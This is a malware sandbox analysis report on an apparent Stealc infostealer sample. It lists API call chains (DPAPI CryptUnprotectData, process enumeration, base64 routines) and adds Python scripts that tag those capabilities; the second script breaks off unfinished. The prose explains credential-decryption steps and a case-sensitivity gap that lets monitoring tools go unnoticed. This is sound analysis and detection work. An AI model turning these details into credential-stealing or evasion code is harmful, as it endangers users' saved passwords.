                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 0b3c490d2364537d69f5e94717f7b5dc1bd66685dc1138a1383c2a05c39638ab
                                        • Instruction ID: 0dcd91fd599ecc1477a191bac816744fcf99641fa0cd3eb5fbc0753e678b413b
                                        • Opcode Fuzzy Hash: 0b3c490d2364537d69f5e94717f7b5dc1bd66685dc1138a1383c2a05c39638ab
                                        • Instruction Fuzzy Hash: B0011E79A14209EBDB20DFA4CD44BEDBBB8BB09700F144688F509D7240D7749B44CF90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: *]x$2r=$Cj)$1O$[w
                                        • API String ID: 0-1766380632
                                        • Opcode ID: 1eed163dcef7a4584f7b01f9687811640bd60be2c3ebdb684b452babfddcc6cd
                                        • Instruction ID: d1d5cd4c609c44f6648ce61f17b294c2d6fb67497d12c9ea38fb2bfc761a048d
                                        • Opcode Fuzzy Hash: 1eed163dcef7a4584f7b01f9687811640bd60be2c3ebdb684b452babfddcc6cd
                                        • Instruction Fuzzy Hash: CF7218F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DE6C4C3740EA7558058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        • Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                        • Instruction ID: 9adcb3d105788d66341962a231b1ff37accd1ca0e33257a4cba7217ccc134794
                                        • Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                        • Instruction Fuzzy Hash: 4A63523241EBD51ECF27CB3847B65527F6ABA1321031E49CEC8C18F5B3C6949A1AE356
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2.$EH~$iNo$iNo
                                        • API String ID: 0-778482689
                                        • Opcode ID: 0a7f06dee358c1ca76b294d730c840de8b92e08f7aad1da1f312b17ef09f0ae5
                                        • Instruction ID: 798964c36454f2ea8358701c19835f8049f46da3f905df83f37c71cdb0f0b981
                                        • Opcode Fuzzy Hash: 0a7f06dee358c1ca76b294d730c840de8b92e08f7aad1da1f312b17ef09f0ae5
                                        • Instruction Fuzzy Hash: B5B2F6F360C2049FE304AE2DEC8567ABBE9EF94320F1A493DE6C4C7744E63598458796
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,009751D4,40000001,00000000,00000000,?,009751D4), ref: 00989050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 16e1fb851cb4040e000a288aa4b8bf4c3caef2074fd6115e5cd5bc06aef5c3fd
                                        • Instruction ID: dad57f8a26a098607acee6e4ca19d4c18e4c83a744346f8c5adb0c5bd46e9eac
                                        • Opcode Fuzzy Hash: 16e1fb851cb4040e000a288aa4b8bf4c3caef2074fd6115e5cd5bc06aef5c3fd
                                        • Instruction Fuzzy Hash: 9D11C574204209EFDB04DF54DC85BBA33A9BF8A310F148958FA1A8B350D779E9419BA1
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00974F3E,00000000,?), ref: 0097A251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A27A
                                        • LocalFree.KERNEL32(?,?,?,?,00974F3E,00000000,?), ref: 0097A28F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: ac983bb3d87e23c8b215abc1dbf94ddea81ed323d9e0738891d8eda055fb7dbd
                                        • Instruction ID: 8504343620fad0d42fabdea23afee22bccb7478002a231b86308fb4c6fd8fd58
                                        • Opcode Fuzzy Hash: ac983bb3d87e23c8b215abc1dbf94ddea81ed323d9e0738891d8eda055fb7dbd
                                        • Instruction Fuzzy Hash: FC116674640308EFEB11CF54CC55FAA77B9FB89B14F208558F9199B290C7B6A941CB50
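The function entries above differ only in their API sequence and argument constants, which is what the report's "API ID" line condenses: the CryptUnprotectData chain at 009772AD, the Toolhelp32 walk at 009897AE, the single CryptBinaryToStringA call at 00989050 and the double CryptStringToBinaryA call around LocalAlloc at 0097A23F. The script below is an added example, not Joe Sandbox code or code from the sample. It parses call lines in the form printed on this page and tags each function with rules whose constants (TH32CS_SNAPPROCESS, CRYPTPROTECT_UI_FORBIDDEN, CRYPT_STRING_BASE64, CRYPT_STRING_NOCRLF) are the Windows SDK values; the tag names are this example's own, and the sample input is constructed by copying those four entries.

```python
"""Tag each per-function API chain in the report with the capability it implements.

Added example, not Joe Sandbox code or code from the sample. Constants are Windows SDK
values, tag names are this example's own, and SAMPLE_REPORT is copied from this page.
"""
import re

# Constructed input: the call lists of four function entries on this page.
SAMPLE_REPORT = """\
APIs
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 009772AD
• RtlAllocateHeap.NTDLL(00000000), ref: 009772B4
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009772E1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00977304
• LocalFree.KERNEL32(?), ref: 0097730E
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009897AE
• Process32First.KERNEL32(00990ACE,00000128), ref: 009897C2
• Process32Next.KERNEL32(00990ACE,00000128), ref: 009897D7
• StrCmpCA.SHLWAPI(?,00000000), ref: 009897EC
• CloseHandle.KERNEL32(00990ACE), ref: 0098980A
APIs
• CryptBinaryToStringA.CRYPT32(00000000,009751D4,40000001,00000000,00000000,?,009751D4), ref: 00989050
APIs
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A23F
• LocalAlloc.KERNEL32(00000040,?,?,?,00974F3E,00000000,?), ref: 0097A251
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00974F3E,00000000,00000000), ref: 0097A27A
• LocalFree.KERNEL32(?,?,?,?,00974F3E,00000000,?), ref: 0097A28F
"""

TH32CS_SNAPPROCESS, CRYPTPROTECT_UI_FORBIDDEN = 0x2, 0x1
CRYPT_STRING_BASE64, CRYPT_STRING_NOCRLF, CRYPT_STRING_FORMAT_MASK = 0x1, 0x40000000, 0xFFFF

# '• Api.MODULE(args), ref: addr'; the parenthesised argument list is absent for some calls.
CALL_RE = re.compile(r"^(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")


def parse_report(text):
    """Group call lines into functions; every 'APIs' heading on the page opens a new one."""
    functions, current = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = m.group("args").split(",") if m.group("args") else []
            current.append({"api": m.group("api"), "args": args, "ref": int(m.group("ref"), 16)})
    return functions


def arg_int(call, index):
    """Argument as int, or None where the sandbox printed '?' (value not recoverable from the dump)."""
    try:
        return int(call["args"][index], 16)
    except (IndexError, ValueError):
        return None


def first(calls, api):
    return next((c for c in calls if c["api"] == api), None)


def rule_dpapi(calls):
    c = first(calls, "CryptUnprotectData")
    if c is None:
        return None
    flags = arg_int(c, 5)  # dwFlags is the sixth parameter of CryptUnprotectData
    return "dpapi-unprotect" + ("-no-ui" if flags and flags & CRYPTPROTECT_UI_FORBIDDEN else "")


def rule_process_enum(calls):
    if not {"Process32First", "Process32Next"} <= {c["api"] for c in calls}:
        return None
    tag, snap = "process-enum", first(calls, "CreateToolhelp32Snapshot")
    if snap and arg_int(snap, 0) == TH32CS_SNAPPROCESS:
        tag += "-snapprocess"
    if any(c["api"].startswith(("StrCmp", "lstrcmp")) for c in calls):
        tag += "-name-compare"  # StrCmpCA is case sensitive: a differently cased image name slips past
    return tag


def base64_flags(call):
    flags = arg_int(call, 2)  # dwFlags is the third parameter of both Crypt*String* APIs
    return flags if flags is not None and flags & CRYPT_STRING_FORMAT_MASK == CRYPT_STRING_BASE64 else None


def rule_base64_encode(calls):
    c = first(calls, "CryptBinaryToStringA")
    flags = base64_flags(c) if c else None
    if flags is None:
        return None
    return "base64-encode" + ("-nocrlf" if flags & CRYPT_STRING_NOCRLF else "")


def rule_base64_decode(calls):
    decodes = [c for c in calls if c["api"] == "CryptStringToBinaryA" and base64_flags(c) is not None]
    if not decodes:
        return None
    # Two calls around LocalAlloc: the first, with a NULL output buffer, only returns the needed size.
    sized = len(decodes) >= 2 and first(calls, "LocalAlloc") is not None
    return "base64-decode" + ("-size-query" if sized else "")


RULES = (rule_dpapi, rule_process_enum, rule_base64_encode, rule_base64_decode)


def classify(text):
    """One {'ref': address of the first call, 'tags': [...]} per function, in page order."""
    return [{"ref": f"{calls[0]['ref']:08X}" if calls else None,
             "tags": [t for t in (rule(calls) for rule in RULES) if t]}
            for calls in parse_report(text)]
```

Two argument details the rules rely on are worth knowing when reading the report by hand: 40000001 passed to CryptBinaryToStringA is CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, so the sample emits base64 without line breaks, and the 00000001 in the sixth CryptUnprotectData parameter is CRYPTPROTECT_UI_FORBIDDEN, so the DPAPI call can never prompt the user. StrCmpCA is a case-sensitive ANSI compare, so a monitoring tool whose image name differs only in case from whatever list the sample carries would not be matched by the Toolhelp32 loop.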
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0181F470,00000000,?,00990DF8,00000000,?,00000000,00000000), ref: 00987BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0181F470,00000000,?,00990DF8,00000000,?,00000000,00000000,?), ref: 00987C0D
                                        • wsprintfA.USER32 ref: 00987C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: b6faff1057f4ac28594b2bca2f578c9ef2cdb7a86fd127644e1bb057b68f6cb0
                                        • Instruction ID: 6a1b6f8978d0671a3a988d4a8b83856166dbd64f573e57fef12ed6c28d15edfb
                                        • Opcode Fuzzy Hash: b6faff1057f4ac28594b2bca2f578c9ef2cdb7a86fd127644e1bb057b68f6cb0
                                        • Instruction Fuzzy Hash: F011CEB0A0A218EFEB209F58DC49FA9B778FB41710F100395F61AA33C0C7745A408B90
APIs
• CoCreateInstance.COMBASE(0098E120,00000000,00000001,0098E110,00000000), ref: 009839A8
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00983A00
Memory Dump Source
• Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Yara matches
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID:
• API String ID: 123533781-0
• Opcode ID: 36b0ae96f8c9f4d6553be1b84209bf9a298b8bc6fc0cd8a5f1ce9f71c077fad8
• Instruction ID: d97e96ef45e2cee05f280eede9905f28b0c179f51c81fdac7a2dceb225b01ef4
• Opcode Fuzzy Hash: 36b0ae96f8c9f4d6553be1b84209bf9a298b8bc6fc0cd8a5f1ce9f71c077fad8
• Instruction Fuzzy Hash: 4C41E975A40A189FDB24DB54CC95F9BB7B5BB48702F4081D8E608E72D0D7B1AE85CF50
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0097A2D4
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0097A2F3
• LocalFree.KERNEL32(?), ref: 0097A323
Memory Dump Source
• Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Yara matches
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID:
• API String ID: 2068576380-0
• Opcode ID: 19bd45c65fb8e1b93c7fe6a06d9e3a4d1809d829b319cc9d0af8a451c7de07d2
• Instruction ID: 9135083948b848140940535002425f7f7cbd6f99e4ab2cd5f7d444dfc22aa735
• Opcode Fuzzy Hash: 19bd45c65fb8e1b93c7fe6a06d9e3a4d1809d829b319cc9d0af8a451c7de07d2
• Instruction Fuzzy Hash: 3511F7B9A00209EFCB04DFA4D988AAEB7B9FF89300F108559ED15A7350D730AE50CF61
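The function record above is the one worth pulling out of this dump first: CryptUnprotectData is the DPAPI decryption entry point, and a DPAPI call bracketed by LocalAlloc/LocalFree in a sample flagged as Stealc is the routine an infostealer needs to recover DPAPI-protected secrets such as the Chromium saved-login key. The Python below is an added example, not part of the Joe Sandbox report: it parses function records in the report's own text form, converts each call site's address to an RVA using the "Offset:" base on the Source File line, and flags functions whose API set matches a watchlist. The SAMPLE text is copied from the two API records on this page, and the watchlist, the record/parse/triage names and the rule name "dpapi_unprotect" are this example's own assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two "APIs" function records in the report's text form
# (copied from this page; section headers and hashes are shortened to the
# fields the parser uses).
SAMPLE = """\
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0097A2D4
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0097A2F3
• LocalFree.KERNEL32(?), ref: 0097A323
Memory Dump Source
• Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID:
• API String ID: 2068576380-0
• Opcode ID: 19bd45c65fb8e1b93c7fe6a06d9e3a4d1809d829b319cc9d0af8a451c7de07d2
• Instruction Fuzzy Hash: 3511F7B9A00209EFCB04DFA4D988AAEB7B9FF89300F108559ED15A7350D730AE50CF61
APIs
• CoCreateInstance.COMBASE(0098E120,00000000,00000001,0098E110,00000000), ref: 009839A8
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00983A00
Memory Dump Source
• Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID:
• API String ID: 123533781-0
• Opcode ID: 36b0ae96f8c9f4d6553be1b84209bf9a298b8bc6fc0cd8a5f1ce9f71c077fad8
• Instruction Fuzzy Hash: 4C41E975A40A189FDB24DB54CC95F9BB7B5BB48702F4081D8E608E72D0D7B1AE85CF50
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int          # virtual address of the call site inside the dump


@dataclass
class FunctionRecord:
    kind: str                                   # "APIs" or "Strings" header
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "API ID", "Opcode ID", ...
    base: int = 0                               # "Offset:" on the Source File line

    def rva_range(self):
        """(lowest, highest) call-site RVA relative to the dump's base."""
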